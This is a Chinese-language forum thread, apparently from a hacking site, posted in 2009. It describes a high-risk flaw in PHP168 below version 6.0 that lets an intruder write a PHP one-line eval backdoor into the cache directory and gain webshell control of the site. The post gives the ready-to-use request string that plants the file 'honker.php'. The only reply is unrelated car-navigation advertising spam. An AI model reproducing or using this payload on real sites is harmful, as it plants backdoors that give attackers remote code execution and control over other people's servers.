WPE|52wpe|我爱WPE

 找回密码
 注册会员
搜索
  • 2663查看
  • 1回复

主题

好友

196

积分

注册会员

发表于 2009-9-10 16:14:39 |显示全部楼层
危险等级:高
影响版本:PHP168 6.0以下版本  
入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。  
测试语句:
     ?makehtml=1&chdb[htmlname]=honker.php&chdb[path]=cache&content=?php%20@eval($_POST[honker]);?
泗沅恩 该用户已被删除
发表于 2010-1-5 17:11:36 |显示全部楼层
原车屏幕升级DVD中文触摸导航改装

专业奔驰/宝马/奥迪/卡宴/路虎/捍马/途锐/捷豹/辉腾/克莱斯勒原车屏幕升级DVD中文触摸导航!


奔驰BenZ 加装解码器、升级模块,实现导航、DVD等功能.宝马、奥迪、路虎……等车原

车OEM屏均可升级









北京润辉汽车导航

http://www.nav-tv.com.cn
回复

使用道具 举报

快速发帖

您需要登录后才可以回帖 登录 | 注册会员

手机版|Archiver|WPE|52wpe|我爱WPE ( 闽ICP备15009081号 )

GMT+8, 2024-4-28 08:08 , Processed in 0.054162 second(s), 17 queries .

返回顶部